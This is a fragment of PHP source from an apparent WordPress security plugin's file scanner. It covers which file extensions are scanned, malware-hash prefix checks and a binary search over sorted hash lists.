if (!$isPHP && preg_match('/^(?:jpg|jpeg|mp3|avi|m4v|mov|mp4|gif|png|tiff?|svg|sql|js|tbz2?|bz2?|xz|zip|tgz|gz|tar|log|err\d+)$/', $fileExt)) {
if (!$options['scansEnabled_scanImages'] && !$isJS) {
return false;
}
}
//If high sensitivity is disabled, don't allow .sql
if (strtolower($fileExt) == 'sql') {
if (!$options['scansEnabled_highSense']) {
return false;
}
}
//Treating as binary, return true
$treatAsBinary = ($isPHP || $isHTML || $options['scansEnabled_scanImages']);
if ($treatAsBinary) {
return true;
}
//Will be malware scanned, return true
if ($isJS) {
return true;
}
return false;
}
private function isMalwarePrefix($hexMD5){
$hasPrefix = $this->_binaryListContains($this->malwareData, wfUtils::hex2bin($hexMD5), 4);
return $hasPrefix !== false;
}
private function isPreviousCoreFile($hexContentsSHAC) {
$hasPrefix = $this->_binaryListContains($this->coreHashesData, wfUtils::hex2bin($hexContentsSHAC), 32);
return $hasPrefix !== false;
}
/**
* @param $binaryList The binary list to search, sorted as a binary string.
* @param $needle The binary needle to search for.
* @param int $size The byte size of each item in the list.
* @return bool|int false if not found, otherwise the index in the list
*/
private function _binaryListContains($binaryList, $needle, $size /* bytes */) {
$p = substr($needle, 0, $size);
$count = ceil(wfWAFUtils::strlen($binaryList) / $size);
$low = 0;
$high = $count - 1;
while ($low <= $high) {
$mid = (int) (($high + $low) / 2);
$val = wfWAFUtils::substr($binaryList, $mid * $size, $size);
$cmp = strcmp($val, $p);
if ($cmp < 0) {
$low = $mid + 1;
}
else if ($cmp > 0) {
$high = $mid - 1;
}
else {
return $mid;
}
}
return false;
}
}